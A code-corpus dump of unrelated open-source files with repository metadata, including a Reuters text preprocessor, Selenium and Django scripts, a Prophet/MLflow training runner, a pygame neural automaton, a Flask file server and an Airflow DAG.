            is_number = re.search('(?<!\S)(?=.)(0|([1-9](\d*|\d{0,2}(,\d{3})*)))?(\.\d*[1-9])?(?!\S)', token)  # pylint: disable=anomalous-backslash-in-string
            if is_number:
                token = number_token
            # split clitics into separate tokens, PTB-style:
            # space before 's and 're etc.
            # was n't did n't etc.
            #if token == 'didn\'t':
            suffix = None
            recognized = False
            if token.endswith('n\'t'):
                suffix = ' n\'t'  # split into 2 tokens
                token = token.replace('n\'t', '')
            elif token.endswith('\'s'):
                suffix = ' \'s'  # split into 2 tokens
                token = token.replace('\'s', '')
            elif token.endswith('\'re'):
                suffix = ' \'re'  # split into 2 tokens
                token = token.replace('\'re', '')
            # replace unknown tokens with UNK
            if not recognized:
                has_key = e.has_key(token)
                if not has_key:
                    token = unknown_token
            #if i<10:
            #  print('Original: ', input_token, ' TOKEN: |', token, '| In dict?: ', has_key, ' EOS?: ', end_of_sentence)
            output_list.append(token)
            if suffix is not None:
                output_list.append(suffix)
            #output = output + token + suffix
            #output = output + ' '
            if end_of_sentence:
                # Reorder some common tokens where the style is peculiar to a particular outlet
                # Reuters style: N million $  N $  N million $
                # PTB (WSJ):     $ N million  $ N  $ N billion
                output_length = len(output_list)
                for k in range(output_length):
                    if k > 0:
                        output_token_1 = output_list[k-1]
                        output_token_2 = output_list[k]
                        # N $ --> $ N
                        if (output_token_1 == 'N') and (output_token_2 == '$'):
                            output_list[k-1] = '$'
                            output_list[k] = 'N'
                        elif k > 1:
                            # N million $ --> $ N million
                            output_token_0 = output_list[k-2]
                            if output_token_0 == 'N' and output_token_1 in ['million', 'billion', 'trillion'] and (
                                    output_token_2 == '$'):
                                output_list[k-2] = '$'
                                output_list[k-1] = 'N'
                                output_list[k] = output_token_1
                # Copy the final list to the output buffer
                for k in range(output_length):
                    output_token = output_list[k]
                    output = output + output_token + ' '
                # Add EOS marker
                output = output + '\n'
                # Clear the token list
                output_list = []  # reset list
        if i < 10:
            print('ArticTx: ', output)
            print('--------------\n\n')
        # assemble the final corpus line, add newline at end
        corpus = corpus + output
        i = i + 1
    print('Articles: ', i)
    with open(output_file, 'a') as text_file:
        text_file.write(corpus)
# tf.app.run parses CLI flags and invokes main(argv).
if __name__ == '__main__':
    tf.app.run()
| Cerenaut/rsm | rsm/scripts/preprocess_reuters.py | preprocess_reuters.py | py | 5,812 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pagi.utils.embedding.Embedding",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "tensorflo... |
38384503953 | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import logging
import datetime
# Daily log file, e.g. Trying01-01-2024.log; filemode='a' appends
# across runs on the same day.
logname = "Trying"+datetime.date.today().strftime("%d-%m-%Y")+".log"
logging.basicConfig(filename=logname,
                    filemode='a',
                    format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
                    datefmt='%H:%M:%S',
                    level=logging.INFO)
chrome_driver_path = "C:/Support/chromedriver.exe"
logging.info(chrome_driver_path)
driver = webdriver.Chrome(chrome_driver_path)
driver.get("http://www.python.org")
# Locate python.org's search box, type a query and submit it via the
# GO button.
search_tab = driver.find_element_by_xpath("//input[(@id='id-search-field') and (@name='q')]")
print("id of bsearch tab is: " + search_tab.get_attribute('id'))
logging.info("id of bsearch tab is: " + search_tab.get_attribute('id'))
search_tab.clear()
search_tab.send_keys("python 2.7")
go_btn = driver.find_element_by_xpath("//button[(@type='submit') and (contains(text(),'GO'))]")
go_btn.click()
#ques = driver.find_element_by_xpath("//a[@value='Questions')]")
#print("question tab got" + ques)
#assert "Python" in driver.title
#elem = driver.find_element_by_name("q")
#elem.clear()
#elem.send_keys("pycon")
#elem.send_keys(Keys.RETURN)
#assert "No results found." not in driver.page_source
driver.close()
#driver.quit()
#driver.quit() | amynav/Testing_repo | trying.py | trying.py | py | 1,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.date.today",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "logging.basicConfig",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.INFO"... |
40600848751 | from django.core.exceptions import ObjectDoesNotExist
from django.shortcuts import render
from watchlist.models import Movie
from django.http import JsonResponse
# Create your views here.
def movie_list(request):
    """Return every movie as JSON: {"movies": [...]}."""
    all_movies = Movie.objects.all()
    payload = {'movies': list(all_movies.values())}
    return JsonResponse(payload)
def movie_details(request, movie_id):
    """Return one movie's fields as JSON, or an error for a bad id."""
    data = {}
    try:
        movie = Movie.objects.get(pk=movie_id)
    except ObjectDoesNotExist:
        data['error'] = "Invalid Movie id"
    else:
        data['name'] = movie.name
        data['description'] = movie.description
        data['active'] = movie.active
    return JsonResponse(data)
| shubham2637/DRF | watchmate/watchlist/views.py | views.py | py | 684 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "watchlist.models.Movie.objects.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "watchlist.models.Movie.objects",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "watchlist.models.Movie",
"line_number": 11,
"usage_type": "name"
... |
35620233152 | """Runs training and evaluation of Prophet models."""
import importlib
import json
import os
import sys
from pathlib import Path
import click
import matplotlib.pyplot as plt
import mlflow
from dask import distributed
from prophet import plot
from prophet.diagnostics import cross_validation, performance_metrics
from prophet.serialize import model_to_json
import utils
# Project-wide configuration (endpoints, paths, CLI defaults).
config = utils.read_config()
# Client needs this set (along with S3 creds if perms required)
# Also need to set envvars:
# - AWS_ACCESS_KEY_ID to minio-user (see mlflow minio vault in ansible)
# - AWS_SECRET_ACCESS_KEY to minio-user-password
os.environ['MLFLOW_S3_ENDPOINT_URL'] = config['mlflow_s3_endpoint_url']
def __load_model(model):
    """Dynamically import a model-definition file and build its model.

    model: pathlib.Path to a python file defining a `model()` factory.
    Returns whatever that factory produces.
    """
    # boilerplate: https://docs.python.org/3/library/importlib.html
    model_name = model.name.split('.')[0]
    spec = importlib.util.spec_from_file_location(model_name, model)
    model_module = importlib.util.module_from_spec(spec)
    # NOTE(review): always registered under the fixed key
    # 'model_module', so loading a second file replaces the first in
    # sys.modules — confirm this is acceptable.
    sys.modules['model_module'] = model_module
    spec.loader.exec_module(model_module)
    return model_module.model()
@click.command()
@click.option('--data_path', default=config['station_file_path'], type=Path, help='Path to station data directory')
@click.option('--tracking_uri', default=config['tracking_uri'], type=str, help='URI to MLFlow tracking')
@click.option('--artifact_path', default=config['artifact_path'], type=Path, help='Path to directory where artifacts will be saved')
@click.option('--git_tag', default=config['git_tag'], type=str, help='DVC git tag (version of data)')
@click.option('--save_model', is_flag=True, help='Save model')
@click.option('--dask', default=None, type=str, help='URL to connect to Dask to parallelize cross validation')
@click.argument('model')
@click.argument('station')
@click.argument('experiment')
def run_model(model, station, experiment, data_path, tracking_uri, artifact_path, git_tag, save_model, dask):
    """Fit, cross-validate and forecast a Prophet model per station,
    logging metrics, params and plots to MLflow.

    model: path to a python file exposing a `model()` factory.
    station: a station name, or 'all' to process every known station.
    experiment: MLflow experiment name.

    Fixes over the previous revision:
    - the model *path* is no longer overwritten by the fitted model
      object, so runs with station='all' work past the first station
      (a fresh model is built and fitted per station);
    - each station now loads its own data instead of re-using the data
      loaded once for the literal `station` CLI argument.
    """
    script_name = Path(__file__).name.split('.py')[0]

    mlflow.set_tracking_uri(tracking_uri)
    mlflow.set_experiment(experiment)

    artifact_path = Path(artifact_path)
    artifact_path.mkdir(exist_ok=True)

    # Keep the path under its own name; `model` is rebound per station.
    model_file = Path(model)

    stations = utils.STATIONS if station == 'all' else [station]

    if dask:
        client = distributed.Client(dask)
        parallel = "dask"
    else:
        parallel = "threads"

    for station in stations:
        with mlflow.start_run(run_name=f'{script_name}-{model_file}') as active_run:
            mlflow.set_tags(
                {
                    'git-tag': git_tag,
                    'station': station,
                    'model': model_file
                }
            )

            # Load this station's data.
            # - cap/floor are the physical bounds respected by logistic
            #   growth models
            station_df = utils.load_station(data_path, station)
            station_df['cap'] = 1
            station_df['floor'] = 0

            # Build and fit a fresh model for this station.
            model = __load_model(model_file)
            model.fit(station_df)

            # Calculate metrics from cross validation
            # - start cross-validation every 30 days, forecast next 180
            metric_keys = ["mse", "rmse", "mae", "mape", "mdape", "smape", "coverage"]
            df_cv = cross_validation(
                model=model,
                period="30 days",
                horizon="180 days",
                parallel=parallel,
                disable_tqdm=True,
            )
            cv_metrics = performance_metrics(df_cv)
            # Metrics close to 0 may be omitted by prophet, so guard keys.
            metrics = {k: cv_metrics[k].mean() for k in metric_keys if k in cv_metrics.keys()}

            # Create forecast
            future = model.make_future_dataframe(periods=365)
            forecast = model.predict(future)

            # Fake SST for the forecast horizon (illustrative only: the
            # real future SST is unknown at this point).
            forecast['sst'] = station_df['sst'].copy()
            guess_temp = station_df['sst'].iloc[-52::].values.copy()
            forecast['sst'].iloc[-52::] = guess_temp

            # Log metrics and model params
            mlflow.log_metrics(metrics)
            params = utils.extract_model_params(model)
            mlflow.log_params(params)

            # Diagnostic figure: raw data + SST, CV error curve, forecast.
            fig, axes = plt.subplots(nrows=3, figsize=(10, 8))
            axes[0].plot(station_df.ds, station_df.y)
            axes[0].set_ylabel('Ice coverage')
            ax2 = axes[0].twinx()
            ax2.plot(station_df.ds, station_df.sst, color='r')
            ax2.set_ylabel('SST')
            plot.plot_cross_validation_metric(df_cv, metric='rmse', ax=axes[1])
            model.plot(forecast, ax=axes[2], ylabel='Ice coverage')
            plot.add_changepoints_to_plot(axes[2], model, forecast)
            image_path = artifact_path / 'training'
            image_path.mkdir(exist_ok=True)
            fname = image_path / f'{station}.png'
            fig.savefig(fname)
            plt.close(fig)
            mlflow.log_artifact(str(fname))

            # Forecast components (plot_components doesn't take an ax).
            fig = model.plot_components(forecast)
            fname = image_path / f'{station}-forecast-components.png'
            fig.savefig(fname)
            plt.close(fig)
            mlflow.log_artifact(str(fname))

            if save_model:
                model_path = artifact_path / 'station-models'
                model_path.mkdir(exist_ok=True)
                fname = model_path / f'{station}-model.json'
                with open(fname, 'w') as fout:
                    json.dump(model_to_json(model), fout)
                # Saves as a runnable artifact. we'll start with just the json file
                # mlflow.prophet.save_model(model, f'{station-model}.json')
| axiom-data-science/project-s2s-sea-ice-guidance | src/experiments/runner.py | runner.py | py | 6,063 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.read_config",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "importlib.util.spec_from_file_location",
"line_number": 31,
"usage_type": "call"
},
{
"api_name... |
16568956344 | from RW import readAll
import os
import json
from PrettyPrint import pretty, prettyJarInfo, prettyNameSpace1, prettyElementKind
import sys
#pathToRawData = r"C:\Users\t-amketk\RawData\RawData"
def get_all_projects(path):
    """Read every Project proto stored under <path>/ProtosOut."""
    return readAll("Projects", "Project", pathToProtos=os.path.join(path, "ProtosOut"))
def get_details_of_commits_with_type_change(project, pathToTypeChangeCommit):
    """Read the TypeChangeCommit protos recorded for *project* from the given protos directory."""
    return readAll("TypeChangeCommit_" + project.name, "TypeChangeCommit", pathToProtos=pathToTypeChangeCommit)
def get_dependency_affected(commitInfo):
    """Summarise the jar-dependency changes attached to a commit proto.

    Returns a dict containing only the non-empty categories 'Updated',
    'Added' and 'Removed', each mapped to a list of pretty-printed jars.
    """
    deps = {}
    change = commitInfo.dependencyUpdate
    if len(change.update) > 0:
        deps['Updated'] = [
            "->".join([prettyJarInfo(item.before), prettyJarInfo(item.after)])
            for item in change.update
        ]
    if len(change.added) > 0:
        deps['Added'] = [prettyJarInfo(item) for item in change.added]
    if len(change.removed) > 0:
        deps['Removed'] = [prettyJarInfo(item) for item in change.removed]
    return deps
def convert(pathToSetup):
pathToJson = pathToSetup
commits = {}
typeChangeDict = {}
for p in get_all_projects(os.path.join(pathToSetup, 'Input'))[:2]:
commit_details = get_details_of_commits_with_type_change(p, os.path.join(pathToSetup, 'Output'))
print()
for cmt in commit_details:
commit_Info = {'sha': cmt.sha, 'project': p.name,
'GitHub_URL': p.url,
'Dependencies': get_dependency_affected(cmt),
'Refactoring': cmt.refactorings._values
}
commits[cmt.sha]= commit_Info
for typeChange in cmt.typeChanges:
instances = []
for instance in typeChange.typeChangeInstances:
mappings = []
for mapping in instance.codeMapping:
replacements = []
for repl in mapping.replcementInferred:
repl_info = {"Before": repl.b4, "After": repl.aftr, "Replacement label": repl.replacementType}
replacements.append(repl_info)
mapping_info = {'IsSame': mapping.isSame, 'Prev Code Snippet': mapping.b4
, 'After Code Snippet': mapping.after
, 'Prev Code snippet url': mapping.urlbB4
, 'After Code snipper url': mapping.urlAftr
, 'Replacements': replacements}
mappings.append(mapping_info)
instance_info = {'From Type': pretty(instance.b4), 'To Type': pretty(instance.aftr)
, 'Element name before': instance.nameB4
, 'Element name after': instance.nameAfter
, 'Element kind affected': prettyElementKind(instance.elementKindAffected)
, 'Visibility of the element': instance.visibility
, 'Syntactic Transformation of type ast': instance.syntacticUpdate.transformation
, 'Github URL of element before': instance.urlB4
, 'Github URL of element after': instance.urlAfter
, 'Adaptations': mappings}
instances.append(instance_info)
typeChange_info = {'sha': cmt.sha, 'project': p.name
, 'From Type': pretty(typeChange.b4), 'To Type': pretty(typeChange.aftr)
, 'Number of Instances': len(typeChange.typeChangeInstances)
, 'Namespace of From Type': prettyNameSpace1(typeChange.nameSpacesB4)
, 'Namespace of To Type': prettyNameSpace1(typeChange.nameSpaceAfter)
, 'Hierarchy Relation': typeChange.hierarchyRelation
, 'Does from type composes To type': typeChange.b4ComposesAfter
, 'Primitive widening': typeChange.primitiveInfo.widening
, 'Primitive narrowing': typeChange.primitiveInfo.narrowing
, 'Primitive unboxing': typeChange.primitiveInfo.unboxing
, 'Primitive boxing': typeChange.primitiveInfo.boxing
, 'Instances': instances}
typeChangeDict.setdefault('->'.join([typeChange_info['From Type'], typeChange_info['To Type']]), [])\
.append(typeChange_info)
with open(os.path.join(pathToJson, "commitInfo.json"), "w+") as outfile:
json.dump(commits, outfile)
with open(os.path.join(pathToJson, "typeChange.json"), "w+") as outfile:
json.dump(typeChangeDict, outfile)
convert(sys.argv[1]) | ameyaKetkar/TypeChangeMiner | scripts/ProtosToJson.py | ProtosToJson.py | py | 4,967 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "RW.readAll",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "RW.readAll",
"line_number": ... |
4472055866 | from math import sin, cos
from components.bubble import Bubble
from components.utils import HF
from data.constants import CONFUSION_COLORS
class EnemyEvent:
def __init__(self, owner, game, data: dict):
self.owner = owner
self.game = game
self.trigger_value = data["trigger value"]
self.action = self.set_action(data["action"])
self.hit = False
self.value = data["value"]
def set_action(self, action: str):
if action == "event bubbles":
return self.drop_bubble
if action == "change speed":
return self.change_speed
if action == "spawn enemies":
return self.spawn_enemies
if action == "enemy split":
return self.enemy_split
if action == "change color":
return self.change_color
return lambda: None
def drop_bubble(self):
bubble = Bubble(self.game.rect, self.owner.x, self.owner.y,
gravitation_radius=self.game.room.gravitation_radius)
self.game.room.bubbles.append(bubble)
def change_speed(self):
self.owner.velocity = HF(self.value)
def spawn_enemies(self):
for _ in range(self.value[1]):
self.game.room.spawn_enemy(self.value[0], self.owner.x, self.owner.y)
def enemy_split(self):
x, y, angle = self.owner.x, self.owner.y, self.owner.body.angle
dx = HF(58.44) * sin(angle)
dy = HF(58.44) * cos(angle)
self.game.room.spawn_enemy("Twin", x + dx, y + dy, angle)
self.game.room.spawn_enemy("Twin", x - dx, y - dy, angle)
def change_color(self):
color_1, color_2, color_3 = CONFUSION_COLORS[self.owner.health % 10]
circle = self.owner.body.current_circles[0]
circle.color = color_1
circle.glares[0].color = circle.glares[1].color = circle.edge_color = color_2
circle.glares[2].color = circle.glares[3].color = color_3
__all__ = ["EnemyEvent"]
| IldarRyabkov/BubbleTanks2 | src/components/enemy_event.py | enemy_event.py | py | 1,981 | python | en | code | 37 | github-code | 36 | [
{
"api_name": "data.constants",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "data.constants",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "data.constants",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "components.bubble.Bubble... |
73881050665 | import six
from sse.exceptions import SseException
__all__ = ['MethodNotAllowed', 'NotFound']
class StreamProtocolException(SseException):
    """
    Base class for stream protocol errors.

    Accepts keyword arguments only for names that are already declared as
    attributes on the exception class (e.g. ``status``/``headers``
    overrides on subclasses); anything else raises ``TypeError``.
    """
    def __init__(self, **kwargs):
        # The file already uses the Python-3-only bare super() call, so the
        # legacy six.iteritems shim is unnecessary: plain dict.items() is
        # behaviourally identical here.
        for key, value in kwargs.items():
            if not hasattr(self, key):
                raise TypeError("%s() received an invalid keyword %r."
                                "only accepts arguments that are already "
                                "attributes of the exception class." % (self.__class__.__name__, key))
            setattr(self, key, value)
class MethodNotAllowed(StreamProtocolException):
    """405 response carrying the mandatory ``Allow`` header.

    ``methods`` is the iterable of HTTP methods the resource supports.
    """
    status = 405

    def __init__(self, methods, **kwargs):
        # RFC 7231 section 7.4.1: Allow is a comma-separated list of
        # methods ("GET, POST"); the original joined them with "/".
        self.headers = (
            ('Allow', ', '.join(m.upper() for m in methods)),
        )
        super().__init__(**kwargs)
class NotFound(StreamProtocolException):
status = 404
| Axik/instamute.io | apps/stream/exceptions.py | exceptions.py | py | 974 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sse.exceptions.SseException",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "six.iteritems",
"line_number": 12,
"usage_type": "call"
}
] |
37393924840 | from django.urls import path
from . import views
app_name = 'tenants'
urlpatterns = [
path('', views.index, name='index'),
path('device_network/', views.device_network, name='device_network'),
path('device_location/', views.device_location, name='device_location'),
path('device/', views.device, name='device'),
path('sensor/', views.sensor, name='sensor'),
path('org_user/', views.org_user, name='org_user'),
path('profile/', views.profile, name='profile'),
path('users/', views.users, name='users'),
path('networks/', views.networks, name='networks'),
path('locations/', views.locations, name='locations'),
path('devices/', views.devices, name='devices'),
path('sensors/', views.sensors, name='sensors'),
path('update_network/<int:network_id>/', views.update_network, name='update_network'),
path('update_location/<int:location_id>/', views.update_location, name='update_location'),
path('update_device/<int:device_id>/', views.update_device, name='update_device'),
path('update_sensor/<int:sensor_id>/', views.update_sensor, name='update_sensor'),
path('delete_entry', views.delete_entry, name='delete_entry'),
path('change_password', views.change_password, name='change_password'),
]
| Being-rayhan/iot | tenants/urls.py | urls.py | py | 1,265 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
17956410019 | import pygame as pg
from random import random as r
from neurobiba import Weights, load_weights, save_weights
import copy
import itertools
W, H, size = 100, 60, 10
pg.init()
screen = pg.display.set_mode((W*size, H*size), 0, 32)
pg.display.set_caption('CYBERBIBA')
def update():
    # Fresh random network (27 inputs = 3x3 neighbourhood x RGB channels,
    # 3 outputs = one RGB colour) plus two W x H canvases of random RGB
    # cells used as a double buffer.
    nn = Weights([27,3])
    canvas1 = [[[r(),r(),r()] for y in range(H)] for x in range(W)]
    canvas2 = copy.deepcopy(canvas1)
    return nn, canvas1, canvas2
# Initial state.
nn, canvas1, canvas2 = update()
is_running = True
while is_running:
    # Keyboard controls: R = reset, S = save weights, L = reset then load weights.
    for event in pg.event.get():
        if event.type == pg.QUIT:
            is_running = False
        if event.type == pg.KEYDOWN:
            if event.key == pg.K_r:
                nn, canvas1, canvas2 = update()
            if event.key == pg.K_s:
                save_weights(nn, "weights")
            if event.key == pg.K_l:
                nn, canvas1, canvas2 = update()
                nn = load_weights("weights")
    # One automaton step: each cell's next colour is the network output for
    # its 3x3 toroidal (modulo wrap-around) neighbourhood, flattened to 27
    # scalar inputs. Results go into the back buffer canvas2.
    for x, i in enumerate(canvas1):
        for y, _ in enumerate(i):
            neighbors = [canvas1[(x+dx-1)%W][(y+dy-1)%H] for dy in range(3) for dx in range(3)]
            neighbors = list(itertools.chain(*neighbors))
            result = nn.feed_forward(neighbors)
            canvas2[x][y] = result
            # Scale the 0..1 outputs to 0..255 RGB.  NOTE(review): the
            # lambda parameter `x` shadows the loop variable `x`.
            color = tuple(map(lambda x: int(x*255),result))
            screen.fill(color, (x*size, y*size, size, size))
    # Swap front/back buffers and present the frame.
    canvas1, canvas2 = canvas2, canvas1
    pg.display.flip()
| displaceman/neurobiba | examples/neural cellular automata/neuroautomata.py | neuroautomata.py | py | 1,435 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "pygame.init",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_mode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "pygame.display... |
35396799058 | from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from contextlib import contextmanager
import tempfile
from pex.pex_builder import PEXBuilder
from twitter.common.collections import OrderedSet
from pants.backend.core.tasks.task import Task
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.base.exceptions import TaskError
class PythonTask(Task):
@classmethod
def register_options(cls, register):
super(PythonTask, cls).register_options(register)
register('--timeout', type=int, default=0,
help='Number of seconds to wait for http connections.')
def __init__(self, *args, **kwargs):
super(PythonTask, self).__init__(*args, **kwargs)
self.conn_timeout = (self.get_options().timeout or
self.context.config.getdefault('connection_timeout'))
self._compatibilities = self.get_options().interpreter or [b'']
self._interpreter_cache = None
self._interpreter = None
@property
def interpreter_cache(self):
if self._interpreter_cache is None:
self._interpreter_cache = PythonInterpreterCache(self.context.config,
logger=self.context.log.debug)
# Cache setup's requirement fetching can hang if run concurrently by another pants proc.
self.context.acquire_lock()
try:
# We pass in filters=compatibilities because setting up some python versions
# (e.g., 3<=python<3.3) crashes, and this gives us an escape hatch.
self._interpreter_cache.setup(filters=self._compatibilities)
finally:
self.context.release_lock()
return self._interpreter_cache
@property
def interpreter(self):
"""Subclasses can use this if they're fine with the default interpreter (the usual case)."""
if self._interpreter is None:
self._interpreter = self.select_interpreter(self._compatibilities)
return self._interpreter
def select_interpreter_for_targets(self, targets):
"""Pick an interpreter compatible with all the specified targets."""
allowed_interpreters = OrderedSet(self.interpreter_cache.interpreters)
targets_with_compatibilities = [] # Used only for error messages.
# Constrain allowed_interpreters based on each target's compatibility requirements.
for target in targets:
if target.is_python and hasattr(target, 'compatibility') and target.compatibility:
targets_with_compatibilities.append(target)
compatible_with_target = list(self.interpreter_cache.matches(target.compatibility))
allowed_interpreters &= compatible_with_target
if not allowed_interpreters:
# Create a helpful error message.
unique_compatibilities = set(tuple(t.compatibility) for t in targets_with_compatibilities)
unique_compatibilities_strs = [','.join(x) for x in unique_compatibilities if x]
targets_with_compatibilities_strs = [str(t) for t in targets_with_compatibilities]
raise TaskError('Unable to detect a suitable interpreter for compatibilities: %s '
'(Conflicting targets: %s)' % (' && '.join(unique_compatibilities_strs),
', '.join(targets_with_compatibilities_strs)))
# Return the lowest compatible interpreter.
return self.interpreter_cache.select_interpreter(allowed_interpreters)[0]
def select_interpreter(self, filters):
"""Subclasses can use this to be more specific about interpreter selection."""
interpreters = self.interpreter_cache.select_interpreter(
list(self.interpreter_cache.matches(filters)))
if len(interpreters) != 1:
raise TaskError('Unable to detect a suitable interpreter.')
interpreter = interpreters[0]
self.context.log.debug('Selected %s' % interpreter)
return interpreter
@contextmanager
def temporary_pex_builder(self, interpreter=None, pex_info=None, parent_dir=None):
"""Yields a PEXBuilder and cleans up its chroot when it goes out of context."""
path = tempfile.mkdtemp(dir=parent_dir)
builder = PEXBuilder(path=path, interpreter=interpreter, pex_info=pex_info)
yield builder
builder.chroot().delete()
| fakeNetflix/square-repo-pants | src/python/pants/backend/python/tasks/python_task.py | python_task.py | py | 4,295 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pants.backend.core.tasks.task.Task",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "pants.backend.python.interpreter_cache.PythonInterpreterCache",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "twitter.common.collections.OrderedSet",
"lin... |
25523783356 | import os
from flask import Flask, make_response, request, redirect, url_for, send_from_directory
from werkzeug.utils import secure_filename
from database import app
UPLOAD_FOLDER = './uploads'
ALLOWED_EXTENSIONS = { 'png', 'jpg', 'mp3' } #to change for music files
app.config['UPLOAD_FOLDER'] = os.path.join(os.getcwd(), "file_transfer/uploads")
print(os.getcwd())
def allowed_file(filename):
    """Return True when *filename* carries an extension listed in ALLOWED_EXTENSIONS."""
    stem, dot, extension = filename.rpartition('.')
    return bool(dot) and extension.lower() in ALLOWED_EXTENSIONS
@app.route('/file/<filename>', methods = ['GET'])
def file_download(filename):
    """Serve an uploaded file from UPLOAD_FOLDER as an attachment (forces download)."""
    return send_from_directory(app.config['UPLOAD_FOLDER'], filename, as_attachment=True)
@app.route('/file', methods = ['POST'])
def file_upload():
    """Accept a multipart upload and store it under UPLOAD_FOLDER.

    Responds with an error message and status code when no file part is
    present, the filename is empty, or the extension is not allowed.
    """
    if 'file' not in request.files:
        return "ERROR : No file part", 404
    file = request.files['file']
    if file.filename == '':
        return "ERROR : No selected file", 401
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        return "File Successfully Uploaded"
    # The original fell through here and returned None, which Flask turns
    # into a 500; report the rejected extension explicitly instead.
    return "ERROR : File type not allowed", 400
@app.route('/file/<filename>', methods = ['DELETE'])
def delete_items(filename):
    """Delete a previously uploaded file.

    The name is sanitised the same way file_upload() sanitises it, so the
    route always targets the file that was actually stored.
    """
    target = os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(filename))
    try:
        os.remove(target)
    except FileNotFoundError:
        # Previously an unknown name crashed with an unhandled OSError (HTTP 500).
        return "ERROR : File not found", 404
    return "File Successfully Deleted"
@app.errorhandler(401)
@app.errorhandler(404)
@app.errorhandler(500)
def ma_page_erreur(error):
return "Error {}".format(error.code), error.code
if __name__ == "__main__":
app.run()
| arkea-tech/YEP_EpiKodi3_2020 | server/file_transfer/views.py | views.py | py | 1,512 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "database.app.config",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "database.app",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_n... |
5762295604 | import os
import sys
from datetime import datetime, timedelta
from airflow.models import DAG
from airflow.operators.python import PythonOperator
from airflow.utils.dates import days_ago
PARENT_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
)
sys.path.append(PARENT_DIR)
from codes.test import add, sub
default_args = {
"owner": "airflow",
}
with DAG(
dag_id="aflow_dag",
description="Datalake to datawarehouse creation",
default_args=default_args,
# schedule_interval="@daily",
schedule_interval=None,
start_date=days_ago(2),
tags=["aflow", "dwh", "datalake", "etl/elt"],
) as dag:
add = PythonOperator(
task_id="add", python_callable=add,
)
sub = PythonOperator(
task_id="sub", python_callable=sub,
)
add >> sub | bhuiyanmobasshir94/Apache-Airflow-Starter | airflow/dags/aflow_dag.py | aflow_dag.py | py | 823 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_numb... |
34743814847 | from typing import List
file = "input02.txt"
with open(file, "rt") as f:
ids = f.readlines()
# Part 1
doubles = 0
triples = 0
for id in ids:
double_found = False
triple_found = False
for c in id:
reps = id.count(c)
if reps == 2 and not double_found:
doubles += 1
double_found = True
if reps == 3 and not triple_found:
triples += 1
triple_found = True
if double_found and triple_found:
break
print(f"Number of doubles: {doubles}")
print(f"Number of triples: {triples}")
print(f"Checksum: {doubles*triples}")
# Part 2
def check(x: str, y: str) -> bool:
    """
    Whether two strings differ at most at one position
    """
    index = 0
    while index < len(x):
        # Index y unconditionally so a shorter y raises IndexError,
        # exactly as the recursive original did.
        cx, cy = x[index], y[index]
        if x[index + 1:] == y[index + 1:]:
            return True
        if cx != cy:
            return False
        index += 1
    return not y
def find_ids(ids: List[str]) -> str:
    """Locate the pair of ids differing at (at most) one position and
    return the characters they share, in order."""
    for idx, first in enumerate(ids):
        for second in ids[idx + 1:]:
            if check(first, second):
                print(f"The found ids: {first}, {second}")
                # Keep only the positions where the two ids agree.
                return "".join(a for a, b in zip(first, second) if a == b)
    raise ValueError("No correct ids were found")
res = find_ids(ids)
print(f"The common substring: {res}")
| acanizares/advent_of_code | day02.py | day02.py | py | 1,405 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 45,
"usage_type": "name"
}
] |
12859158519 | import torch
import numpy as np
import matplotlib.pyplot as plt
print("PyTorch Version:", torch.__version__)
# Prefer CUDA, then Apple-Silicon MPS, then CPU.  The original computed an
# MPS device but never used it, always falling back to cuda/cpu afterwards.
if torch.cuda.is_available():
    device = torch.device('cuda')
elif torch.backends.mps.is_available():
    device = torch.device('mps')
